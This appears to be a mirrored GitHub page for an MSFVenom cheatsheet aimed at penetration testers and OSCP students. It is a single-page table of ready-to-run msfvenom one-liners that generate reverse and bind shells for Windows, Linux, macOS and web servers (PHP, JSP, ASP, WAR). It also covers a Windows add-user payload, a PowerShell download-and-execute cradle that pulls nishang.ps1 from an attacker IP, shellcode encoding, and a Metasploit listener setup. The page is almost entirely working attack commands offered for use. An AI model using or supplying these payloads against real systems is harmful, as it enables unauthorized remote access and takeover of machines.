frizb/MSF-Venom-Cheatsheet frizb/MSF-Venom-Cheatsheet

  • Stars
    star
    235
  • Rank 170,147 (Top 4 %)
  • Language
  • Created about 6 years ago
  • Updated over 5 years ago
Twitter logo Share LinkedIn logo Share Facebook logo Share
frizb/MSF-Venom-Cheatsheet
github

frizb

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

Single Page Cheatsheet for common MSF Venom One Liners

MSFVenom Cheatsheet

Single Page Cheatsheet for common MSF Venom One Liners
Available in PDF, DOCX and Markdown format! PDF and DOCX versions contain the payload size in bytes and a few more commands.

MSFVenom Cheatsheet

MSFVenom Payload Generation One-Liner Description
msfvenom -l payloads List available payloads
msfvenom -p PAYLOAD --list-options List payload options
msfvenom -p PAYLOAD -e ENCODER -f FORMAT -i ENCODE COUNT LHOST=IP Payload Encoding
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f elf > shell.elf Linux Meterpreter reverse shell x86 multi stage
msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=IP LPORT=PORT -f elf > shell.elf Linux Meterpreter bind shell x86 multi stage
msfvenom -p linux/x64/shell_bind_tcp RHOST=IP LPORT=PORT -f elf > shell.elf Linux bind shell x64 single stage
msfvenom -p linux/x64/shell_reverse_tcp RHOST=IP LPORT=PORT -f elf > shell.elf Linux reverse shell x64 single stage
msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe Windows Meterpreter reverse shell
msfvenom -p windows/meterpreter_reverse_http LHOST=IP LPORT=PORT HttpUserAgent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36" -f exe > shell.exe Windows Meterpreter http reverse shell
msfvenom -p windows/meterpreter/bind_tcp RHOST= IP LPORT=PORT -f exe > shell.exe Windows Meterpreter bind shell
msfvenom -p windows/shell/reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe Windows CMD Multi Stage
msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe Windows CMD Single Stage
msfvenom -p windows/adduser USER=hacker PASS=password -f exe > useradd.exe Windows add user
msfvenom -p osx/x86/shell_reverse_tcp LHOST=IP LPORT=PORT -f macho > shell.macho Mac Reverse Shell
msfvenom -p osx/x86/shell_bind_tcp RHOST=IP LPORT=PORT -f macho > shell.macho Mac Bind shell
msfvenom -p cmd/unix/reverse_python LHOST=IP LPORT=PORT -f raw > shell.py Python Shell
msfvenom -p cmd/unix/reverse_bash LHOST=IP LPORT=PORT -f raw > shell.sh BASH Shell
msfvenom -p cmd/unix/reverse_perl LHOST=IP LPORT=PORT -f raw > shell.pl PERL Shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f asp > shell.asp ASP Meterpreter shell
msfvenom -p java/jsp_shell_reverse_tcp LHOST=IP LPORT=PORT -f raw > shell.jsp JSP Shell
msfvenom -p java/jsp_shell_reverse_tcp LHOST=IP LPORT=PORT -f war > shell.war WAR Shell
msfvenom -p php/meterpreter_reverse_tcp LHOST=IP LPORT=PORT -f raw > shell.php cat shell.php pbcopy && echo '?php '
msfvenom -p php/reverse_php LHOST=IP LPORT=PORT -f raw > phpreverseshell.php Php Reverse Shell
msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \"IEX(New-Object Net.webClient).downloadString('http://IP/nishang.ps1')\"" -f python Windows Exec Nishang Powershell in python
msfvenom -p windows/shell_reverse_tcp EXITFUNC=process LHOST=IP LPORT=PORT -f c -e x86/shikata_ga_nai -b "\x04\xA0" Bad characters shikata_ga_nai
msfvenom -p windows/shell_reverse_tcp EXITFUNC=process LHOST=IP LPORT=PORT -f c -e x86/fnstenv_mov -b "\x04\xA0" Bad characters fnstenv_mov

Multihandler Listener

To get multiple session on a single multi/handler, you need to set the ExitOnSession option to false and run the exploit -j instead of just the exploit. For example, for meterpreter/reverse_tcp payload,

msf>use exploit/multi/handler  
msf>set payload windows/meterpreter/reverse_tcp  
msf>set lhost <IP>  
msf>set lport <PORT>  
msf> set ExitOnSession false  
msf>exploit -j

The -j option is to keep all the connected session in the background.

References

https://kb.help.rapid7.com/discuss/598ab88172371b000f5a4675
https://thor-sec.com/cheatsheet/oscp/msfvenom_cheat_sheet/
http://security-geek.in/2016/09/07/msfvenom-cheat-sheet/

More Repositories

1

Windows-Privilege-Escalation

Windows Privilege Escalation Techniques and Scripts
Batchfile
762
star
2

Hashcat-Cheatsheet

Hashcat Cheatsheet for OSCP
588
star
3

Vanquish

Vanquish is Kali Linux based Enumeration Orchestrator. Vanquish leverages the opensource enumeration tools on Kali to perform multiple active information gathering phases.
Python
500
star
4

Hydra-Cheatsheet

Hydra Password Cracking Cheetsheet
365
star
5

Bypassing-Web-Application-Firewalls

A series of python scripts for generating weird character combinations for bypassing web application firewalls (WAF) and XSS blockers
Python
272
star
6

Linux-Privilege-Escalation

Tips and Tricks for Linux Priv Escalation
217
star
7

PasswordDecrypts

Handy Stored Password Decryption Techniques
128
star
8

FirmwareReverseEngineering

Notes and tools from my experiences reverse engineering firmware
Python
104
star
9

HackingWithCurl

A list of examples and references of hacking with Bash and the Curl command
50
star
10

WordListGen

Super Simple Python Word List Generator for Fuzzing and Brute Forcing in Python
Python
48
star
11

WindowsShells

Information Repository on Various Methods of getting shell access into a Windows machine
16
star
12

BloodHoundCustomQueries

List of Bloodhound Python Custom Queries which I have found to be handy on engagements
Python
16
star
13

Powershell-Cheatsheet

Hand list of Powershell commands frequently used during penetration tests
14
star
14

Active-Directory-Fun

Notes on Active Directory analysis and exploitation
11
star
15

WindowsMeterpreterSessionDied

Some exploits are unstable in nature and only allow for a very short shell command window. These scripts can help extend your remote shell session by quickly spawning a new reverse shell.
Batchfile
8
star
16

SQLMapExamples

A list of sample SQL Map Injection Commands
Python
7
star
17

Wordlust

Wordlust is a Password Base Wordlist for Hashcat Mutator Rules
7
star
18

Python_DES_Decryptor

A simple python script for decrypting DES that has been generated by a .NET application
Python
6
star
19

Directory-Traversal-Toolbox

A few handy scripts for pulling important files off remote machines using a directory traversal or local file include vulnerability.
Python
6
star
20

DirtyStringInjectOneLiner

A one liner dirty string with many common injection techniques
4
star
21

CTF-Walkthroughs

A collection of CTF Walkthroughs
4
star
22

OpenSSL-Enc-By-Example

Examples of how to use openssl-enc for symmetric cipher encryption and decryption
3
star
23

MouseJacking

MouseJacking on Kali Linux with CrazyRadio PA
3
star
24

SSH_Sample_Keys

A collection of Public and Private SSH keys for reference purposes
3
star
25

SiteMapMaker

Creates an HTML site map based on a specified base URL and a folder path. Handy for exploring for hidden content in Burp Suite if you have the application’s source code.
Python
2
star
26

MagicPing

Python 2.7 raw socket ICMP ping to send a embedded message or a magic ping to an endpoint
Python
2
star
27

KaliTroubleshooting

Handy Tricks for Troubleshooting Kali
2
star
28

XOR_MOAR

Simple Python Utilities Developed During CTF Events For XORing Data
Python
2
star
29

c2

C2
1
star
30

CLISerialFuzzer

Serial Connection CLI Command Jail Break Fuzzer
Python
1
star
31

VR-Industrial-Control-Room

Virtual Reality experience that transports people into an industrial control room environment.
ASP
1
star